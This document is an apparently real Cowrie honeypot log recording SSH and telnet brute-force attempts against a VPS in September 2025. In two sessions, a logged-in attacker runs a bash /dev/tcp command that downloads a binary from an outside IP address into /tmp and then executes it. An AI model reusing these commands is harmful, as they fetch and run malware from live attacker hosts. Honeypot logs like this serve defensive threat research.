{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:16:15.870326Z","src_ip":"217.72.205.35","session":"128c6816ec6a"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":58242,"dst_ip":"1.2.3.4","dst_port":22,"session":"12011c6c67d4","protocol":"ssh","message":"New connection: 8.138.136.155:58242 (1.2.3.4:22) [session: 12011c6c67d4]","sensor":"my-vps","timestamp":"2025-09-08T17:18:58.158883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T17:18:58.159846Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T17:18:58.160352Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T17:18:58.867048Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:19:00.087824Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:19:00.589698Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T17:19:00.591589Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/6CCXREpv9t && chmod +x /tmp/6CCXREpv9t && /tmp/6CCXREpv9t iK6msCAp9Ly7L9+cjsw2OtiLm981sK30NSGoprr957+vtjY187e0Md+bisI6LNCMnMAzt73rPyq8ob74/ba3vjY29rWsMN2dk9M3N9iLm98ws6aSaMGLqdLQMzj9+uluPjyMVFETObFdF66TR/8cb1lH\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/6CCXREpv9t && chmod +x /tmp/6CCXREpv9t && /tmp/6CCXREpv9t iK6msCAp9Ly7L9+cjsw2OtiLm981sK30NSGoprr957+vtjY187e0Md+bisI6LNCMnMAzt73rPyq8ob74/ba3vjY29rWsMN2dk9M3N9iLm98ws6aSaMGLqdLQMzj9+uluPjyMVFETObFdF66TR/8cb1lH\" &","sensor":"my-vps","timestamp":"2025-09-08T17:19:06.822373Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/45HHfSlsxD","message":"CMD: head -c 1458464 > /tmp/45HHfSlsxD","sensor":"my-vps","timestamp":"2025-09-08T17:19:06.825791Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T17:19:07.054773Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T17:19:07.059532Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T17:19:07.063076Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4559fefac738a6b9acee6564ba4f5a775cb0fc249269b71c5424d25dd9fdebf2","size":1988,"shasum":"4559fefac738a6b9acee6564ba4f5a775cb0fc249269b71c5424d25dd9fdebf2","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/4559fefac738a6b9acee6564ba4f5a775cb0fc249269b71c5424d25dd9fdebf2 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:19:07.064767Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:19:07.066153Z","src_ip":"8.138.136.155","session":"12011c6c67d4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55504,"dst_ip":"1.2.3.4","dst_port":22,"session":"93e19a1fb7a8","protocol":"ssh","message":"New connection: 217.72.205.35:55504 (1.2.3.4:22) [session: 93e19a1fb7a8]","sensor":"my-vps","timestamp":"2025-09-08T17:22:53.560620Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:22:53.561712Z","src_ip":"217.72.205.35","session":"93e19a1fb7a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41788,"dst_ip":"1.2.3.4","dst_port":22,"session":"cedd08f7b41e","protocol":"ssh","message":"New connection: 212.227.125.160:41788 (1.2.3.4:22) [session: cedd08f7b41e]","sensor":"my-vps","timestamp":"2025-09-08T17:24:22.641621Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:24:22.642714Z","src_ip":"212.227.125.160","session":"cedd08f7b41e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42064,"dst_ip":"1.2.3.4","dst_port":22,"session":"534bfb468db7","protocol":"ssh","message":"New connection: 212.227.125.160:42064 (1.2.3.4:22) [session: 534bfb468db7]","sensor":"my-vps","timestamp":"2025-09-08T17:24:22.753825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:24:22.754827Z","src_ip":"212.227.125.160","session":"534bfb468db7"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T17:24:22.866913Z","src_ip":"212.227.125.160","session":"534bfb468db7"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:24:23.203814Z","src_ip":"212.227.125.160","session":"534bfb468db7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T17:24:23.316511Z","session":"534bfb468db7"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.20","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"a592d998c9d6","protocol":"ssh","message":"New connection: 194.0.234.20:65105 (1.2.3.4:22) [session: a592d998c9d6]","sensor":"my-vps","timestamp":"2025-09-08T17:24:37.630348Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:24:37.646314Z","src_ip":"194.0.234.20","session":"a592d998c9d6"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:25:32.751625Z","src_ip":"212.227.125.160","session":"534bfb468db7"}
{"eventid":"cowrie.session.connect","src_ip":"125.138.132.167","src_port":41148,"dst_ip":"1.2.3.4","dst_port":23,"session":"c83c4e11dda1","protocol":"telnet","message":"New connection: 125.138.132.167:41148 (1.2.3.4:23) [session: c83c4e11dda1]","sensor":"my-vps","timestamp":"2025-09-08T17:27:05.490482Z"}
{"eventid":"cowrie.session.closed","duration":31.54989528656006,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:27:37.040287Z","src_ip":"125.138.132.167","session":"c83c4e11dda1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54268,"dst_ip":"1.2.3.4","dst_port":22,"session":"d33b7e4ce7f5","protocol":"ssh","message":"New connection: 217.72.205.35:54268 (1.2.3.4:22) [session: d33b7e4ce7f5]","sensor":"my-vps","timestamp":"2025-09-08T17:29:38.213466Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:29:38.214582Z","src_ip":"217.72.205.35","session":"d33b7e4ce7f5"}
{"eventid":"cowrie.session.connect","src_ip":"167.58.87.74","src_port":47512,"dst_ip":"1.2.3.4","dst_port":23,"session":"1dfb66a68c40","protocol":"telnet","message":"New connection: 167.58.87.74:47512 (1.2.3.4:23) [session: 1dfb66a68c40]","sensor":"my-vps","timestamp":"2025-09-08T17:29:39.096769Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45743,"dst_ip":"1.2.3.4","dst_port":23,"session":"f3020ab9010a","protocol":"telnet","message":"New connection: 212.227.125.160:45743 (1.2.3.4:23) [session: f3020ab9010a]","sensor":"my-vps","timestamp":"2025-09-08T17:29:42.928990Z"}
{"eventid":"cowrie.session.closed","duration":13.485439777374268,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:29:52.582139Z","src_ip":"167.58.87.74","session":"1dfb66a68c40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21084,"dst_ip":"1.2.3.4","dst_port":23,"session":"b870b66255dc","protocol":"telnet","message":"New connection: 212.227.235.229:21084 (1.2.3.4:23) [session: b870b66255dc]","sensor":"my-vps","timestamp":"2025-09-08T17:29:53.471510Z"}
{"eventid":"cowrie.session.connect","src_ip":"121.46.231.41","src_port":10991,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5060796d2af","protocol":"ssh","message":"New connection: 121.46.231.41:10991 (1.2.3.4:22) [session: a5060796d2af]","sensor":"my-vps","timestamp":"2025-09-08T17:29:57.662957Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:29:57.664174Z","src_ip":"121.46.231.41","session":"a5060796d2af"}
{"eventid":"cowrie.session.closed","duration":12.15949034690857,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:30:05.630927Z","src_ip":"212.227.235.229","session":"b870b66255dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22384,"dst_ip":"1.2.3.4","dst_port":23,"session":"a9af031864cd","protocol":"telnet","message":"New connection: 212.227.235.229:22384 (1.2.3.4:23) [session: a9af031864cd]","sensor":"my-vps","timestamp":"2025-09-08T17:30:05.955090Z"}
{"eventid":"cowrie.session.closed","duration":30.8781418800354,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:30:13.807048Z","src_ip":"212.227.125.160","session":"f3020ab9010a"}
{"eventid":"cowrie.session.closed","duration":12.665377855300903,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:30:18.620390Z","src_ip":"212.227.235.229","session":"a9af031864cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23705,"dst_ip":"1.2.3.4","dst_port":23,"session":"d75a36964140","protocol":"telnet","message":"New connection: 212.227.235.229:23705 (1.2.3.4:23) [session: d75a36964140]","sensor":"my-vps","timestamp":"2025-09-08T17:30:18.986370Z"}
{"eventid":"cowrie.session.connect","src_ip":"211.221.93.56","src_port":36198,"dst_ip":"1.2.3.4","dst_port":23,"session":"968f8f621871","protocol":"telnet","message":"New connection: 211.221.93.56:36198 (1.2.3.4:23) [session: 968f8f621871]","sensor":"my-vps","timestamp":"2025-09-08T17:30:19.832253Z"}
{"eventid":"cowrie.session.closed","duration":12.622827768325806,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:30:31.609132Z","src_ip":"212.227.235.229","session":"d75a36964140"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25162,"dst_ip":"1.2.3.4","dst_port":23,"session":"14a6e7f634b4","protocol":"telnet","message":"New connection: 212.227.235.229:25162 (1.2.3.4:23) [session: 14a6e7f634b4]","sensor":"my-vps","timestamp":"2025-09-08T17:30:32.128116Z"}
{"eventid":"cowrie.session.closed","duration":12.464287281036377,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:30:44.592336Z","src_ip":"212.227.235.229","session":"14a6e7f634b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":18702,"dst_ip":"1.2.3.4","dst_port":23,"session":"276a8337e4d2","protocol":"telnet","message":"New connection: 212.227.235.229:18702 (1.2.3.4:23) [session: 276a8337e4d2]","sensor":"my-vps","timestamp":"2025-09-08T17:30:44.964727Z"}
{"eventid":"cowrie.session.closed","duration":30.36122417449951,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:30:50.193405Z","src_ip":"211.221.93.56","session":"968f8f621871"}
{"eventid":"cowrie.session.closed","duration":12.611738920211792,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:30:57.576398Z","src_ip":"212.227.235.229","session":"276a8337e4d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":20055,"dst_ip":"1.2.3.4","dst_port":23,"session":"f22080378211","protocol":"telnet","message":"New connection: 212.227.235.229:20055 (1.2.3.4:23) [session: f22080378211]","sensor":"my-vps","timestamp":"2025-09-08T17:30:58.000910Z"}
{"eventid":"cowrie.session.closed","duration":12.567933797836304,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:31:10.568773Z","src_ip":"212.227.235.229","session":"f22080378211"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21365,"dst_ip":"1.2.3.4","dst_port":23,"session":"9a6c2a542223","protocol":"telnet","message":"New connection: 212.227.235.229:21365 (1.2.3.4:23) [session: 9a6c2a542223]","sensor":"my-vps","timestamp":"2025-09-08T17:31:10.914922Z"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":50206,"dst_ip":"1.2.3.4","dst_port":22,"session":"37a071669e64","protocol":"ssh","message":"New connection: 170.64.157.139:50206 (1.2.3.4:22) [session: 37a071669e64]","sensor":"my-vps","timestamp":"2025-09-08T17:31:17.282754Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:31:17.587556Z","src_ip":"170.64.157.139","session":"37a071669e64"}
{"eventid":"cowrie.session.closed","duration":12.642784833908081,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:31:23.557643Z","src_ip":"212.227.235.229","session":"9a6c2a542223"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22685,"dst_ip":"1.2.3.4","dst_port":23,"session":"737ebf05c177","protocol":"telnet","message":"New connection: 212.227.235.229:22685 (1.2.3.4:23) [session: 737ebf05c177]","sensor":"my-vps","timestamp":"2025-09-08T17:31:23.972180Z"}
{"eventid":"cowrie.session.closed","duration":12.533852338790894,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:31:36.505967Z","src_ip":"212.227.235.229","session":"737ebf05c177"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":43694,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8d9b328b315","protocol":"ssh","message":"New connection: 170.64.157.139:43694 (1.2.3.4:22) [session: f8d9b328b315]","sensor":"my-vps","timestamp":"2025-09-08T17:33:03.193052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:33:03.245594Z","src_ip":"170.64.157.139","session":"f8d9b328b315"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:33:03.491503Z","src_ip":"170.64.157.139","session":"f8d9b328b315"}
{"eventid":"cowrie.login.failed","username":"test1","password":"test1","message":"login attempt [test1/test1] failed","sensor":"my-vps","timestamp":"2025-09-08T17:33:04.682583Z","src_ip":"170.64.157.139","session":"f8d9b328b315"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:33:05.982089Z","src_ip":"170.64.157.139","session":"f8d9b328b315"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":34854,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fe0f8c3621a","protocol":"ssh","message":"New connection: 8.138.136.155:34854 (1.2.3.4:22) [session: 2fe0f8c3621a]","sensor":"my-vps","timestamp":"2025-09-08T17:33:54.804992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T17:33:54.806005Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T17:33:54.806467Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T17:33:55.502883Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:33:56.727411Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:33:57.222278Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T17:33:57.224387Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/9J1kN44sq0 && chmod +x /tmp/9J1kN44sq0 && /tmp/9J1kN44sq0 +/qixjX6T0rgIsWr6pSI7KnCPOVOSfQ02qHrjZTopsQi7ExE4jzFp+Kai+yr2j3lR1DlO8e97oKA7KPFOOZeRvo9x6v0i4nsvcU54URI5D3FovaMO1mVh+ySU5mtqFZMPTM=\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/9J1kN44sq0 && chmod +x /tmp/9J1kN44sq0 && /tmp/9J1kN44sq0 +/qixjX6T0rgIsWr6pSI7KnCPOVOSfQ02qHrjZTopsQi7ExE4jzFp+Kai+yr2j3lR1DlO8e97oKA7KPFOOZeRvo9x6v0i4nsvcU54URI5D3FovaMO1mVh+ySU5mtqFZMPTM=\" &","sensor":"my-vps","timestamp":"2025-09-08T17:34:03.457431Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/zoGiFXuvBj","message":"CMD: head -c 1458464 > /tmp/zoGiFXuvBj","sensor":"my-vps","timestamp":"2025-09-08T17:34:03.461011Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T17:34:03.689031Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T17:34:03.694039Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T17:34:03.697808Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a5989d782c1dbad9261f4b510504ef93b6ed923e53726483965d6dda3de77b09","size":1944,"shasum":"a5989d782c1dbad9261f4b510504ef93b6ed923e53726483965d6dda3de77b09","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/a5989d782c1dbad9261f4b510504ef93b6ed923e53726483965d6dda3de77b09 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:34:03.699397Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:34:03.700837Z","src_ip":"8.138.136.155","session":"2fe0f8c3621a"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":54612,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa4116938da1","protocol":"ssh","message":"New connection: 170.64.157.139:54612 (1.2.3.4:22) [session: fa4116938da1]","sensor":"my-vps","timestamp":"2025-09-08T17:34:32.488547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:34:32.489465Z","src_ip":"170.64.157.139","session":"fa4116938da1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sh